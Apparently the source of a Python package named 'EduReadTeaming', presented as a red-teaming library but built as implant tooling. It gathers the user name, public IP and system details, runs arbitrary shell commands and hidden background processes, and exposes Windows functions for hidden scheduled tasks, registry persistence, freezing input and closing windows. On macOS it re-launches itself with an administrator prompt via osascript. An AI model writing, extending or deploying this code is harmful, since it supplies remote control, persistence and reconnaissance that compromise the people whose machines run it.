import requests
import subprocess
import sys
from getpass import getuser
from datetime import date
import psutil
import platform
import os


class EduReadTeaming:
    def __init__(self):
        print("Use it Responsibily! Like Pentesting in controlled environment!")

    def check_network(self):
        try:
            requests.get("https://google.com", timeout=5)
            print("Network is Working!")
            return True
        
        except:
            print("Network is not Working!")
            return False
        
    def check_Os(self):
        return platform.system()
        
    def is_admin(self):
        """
        Check if the script is running with administrator privileges.
        """
        if platform.system() == "Windows":
            import ctypes

            try:
                return ctypes.windll.shell32.IsUserAnAdmin()
            except:
                return False
        else:
            return os.geteuid() == 0  # Linux/macOS
        

    def get_some_data(self):
        ip = requests.get("https://ifconfig.me").text
        message = f"Current Path: {sys.executable},\nUsername: {getuser()},\nPublic ip: {ip},\nToday's date: {str(date.today())}"
        return message

    def get_system_info(self):
        try:
            info = {
                "OS": platform.system(),
                "OS Version": platform.version(),
                "OS Release": platform.release(),
                "Machine": platform.machine(),
                "Processor": platform.processor(),
                "CPU Cores (Physical)": psutil.cpu_count(logical=False),
                "CPU Cores (Logical)": psutil.cpu_count(logical=True),
                "CPU Frequency (MHz)": psutil.cpu_freq().current if psutil.cpu_freq() else None,
                "Total RAM (GB)": round(psutil.virtual_memory().total / (1024 ** 3), 2),
                "Python Version": platform.python_version(),
                "Hostname": platform.node(),
                "Current User": getuser()
            }
            return info
        except Exception as e:
            return {"Error": str(e)}
        
    def chdir(self, changeLocation):
        list_key = changeLocation.split(" ")

        try:
            os.chdir(" ".join(list_key[1:]))
            return f"Changed directory to: {os.getcwd()}"
        except Exception as e:
            return f"cd error: {e}"
        
    def command_execution(self, message):
            cmdd = message

            try:
                cc = subprocess.check_output(cmdd, shell=True, stderr=subprocess.STDOUT)

                return cc.decode(errors="ignore")
            except subprocess.CalledProcessError as e:
                return e.cc.decode(errors="ignore")


import platform
import sys

from .cors import EduReadTeaming
from .Linux_and_MAC import ForLinuxMac


###### _______CORS_______ ######
_cors = EduReadTeaming()

def check_network():
    return _cors.check_network()

def check_platform():
    return _cors.check_Os()

def is_admin():
    return _cors.is_admin()

def get_some_info():
    return _cors.get_some_data()

def get_system_info():
    return _cors.get_system_info()

def execution(command):
    return _cors.command_execution(message=command)
###### _________________ ######


###### _______LINUX_MAC_______ ######
_linux_mac = ForLinuxMac()

def run_background_command(command):
    return _linux_mac.run_background_command(command)

###### _______________________ ######


__all__ = [
    "check_network",
    "check_platform",
    "is_admin",
    "get_some_info",
    "get_system_info",
    "execution",
    "run_background_command",
]


system = platform.system()

if system == "Windows":
    try:
        from .platforms.Windows import ForWindows

        _windows = ForWindows()

        def run_command_to_schedule(command, hide_window=False, task_name="MyTask", pre_built_command=True):
            return _windows.run_powershell_command(command, hide_window, task_name, pre_built_command)
        
        def Registration(name_of_reg, location=sys.executable):
            return _windows.add_to_Reg(name_of_reg, location)
        
        def Close_All_Windows():
            return _windows.close_windows()
        
        def get_admin_windows():
            return _windows.get_admin_Windows()
        
        def freeze():
            return _windows.freeze()
        
        def unfreeze():
            return _windows.unfreeze()
        
        def searchPathByname(name):
            return _windows.searchPathByname(name)
        
        def getpidbyname(name):
            return _windows.getpidbyname(name)
        
        __all__ += [
            "run_command_to_schedule",
            "Registration",
            "Close_All_Windows",
            "get_admin_windows",
            "freeze",
            "unfreeze",
            "searchPathByname",
            "getpidbyname",
        ]

    except ImportError:
        pass

elif system == "Linux":
    try:
        from .platforms.Linux import ForLinux

        _linux = ForLinux()

        def get_admin_linux():
            return _linux.get_admin_linux()
        
        __all__.append("get_admin_linux")
        
    except ImportError:
        pass

elif system == "Darwin":
    try:
        from .platforms.MAC import ForMAC

        _mac = ForMAC()

        def get_admin_mac():
            return _mac.get_admin_mac()
        
        __all__.append("get_admin_mac")
        
    except ImportError:
        pass


import subprocess
import platform


class ForLinuxMac:
    def __init__(self):
        print(platform.system())

    def run_background_command(self, command: str):
        try:
            subprocess.Popen(
                command,
                shell=True,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                stdin=subprocess.DEVNULL
            )

            return True
        
        except Exception as e:
            print(e)

            return False


import os
import sys


class ForMAC:
    def __init__(self):
        print("For only MAC")

    def get_admin_mac(self):
        script = f'''
        do shell script "{sys.executable} {' '.join(sys.argv)}" with administrator privileges
        '''
        os.system(f"osascript -e '{script}'")

        sys.exit()